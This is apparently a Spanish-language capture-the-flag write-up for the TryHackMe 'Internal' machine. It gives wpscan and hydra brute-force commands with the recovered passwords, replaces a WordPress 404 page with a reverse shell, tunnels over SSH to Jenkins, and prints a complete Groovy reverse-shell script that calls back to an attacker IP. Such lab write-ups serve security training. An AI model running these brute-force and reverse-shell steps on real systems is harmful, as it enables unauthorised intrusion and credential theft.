---
title: "[ TRYHACKME ] INTERNAL"
date: 2021-03-28T13:17:53+02:00
draft: false
toc: false
---

Tiramos nmap, sabemos que corre un wordpress.

encontramos un usuario gracias a wpscan:

wpscan --url http://internal.thm/blog --enumerate u

Encontramos el usuario "admin"

Encontramos su contraseña:

wpscan --url http://internal.thm/blog -U  admin -P /usr/share/wordlists/rockyou.txt

Constraseña: my2boys

Nos dirigimos al código 404.php y lo cambiamos por el de una reverse shell.

nc -lvnp 4444

Estamos dentro.

Abrimos el fichero cat /opt/wp-save.txt

Cojemos las credenciales y las introducimos en su aubreanna y abrimos user.txt.

Nos conectamos a ssh con:

ssh -L 8888:172.17.0.2:8080 aubreanna@internal.thm

Vamos a la dirección 127.0.0.1:8888 y tenemos un login de jenkins

Para sacar la contraseña del admin:

hydra -l admin -P /usr/share/wordlists/rockyou.txt -s 8888 127.0.0.1 http-post-form “/j_acegi_security_check:j_username=admin&j_password=^PASS^&from=%2F&Submit=Sign+in&Login=Login:Invalid username or password”

Contraseña: spongebob

Vamos a la consola "localhost:8888/script" y añadimos este código para crear una reverse shell dentro de Jenkins:

String host="10.14.5.201";
int port=6666;
String cmd="bash";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

"nc -lvnp 6666" y ya tendriamos una shell inversa

find . -name *.txt 2>/dev/null 

cat /opt/note.txt y tenemos las credenciales de root

en la ssh ponemos "su root", ponemos su contraseña y ya estariamos en root.

cat /root/root.txt y sacamos la segunda flag.


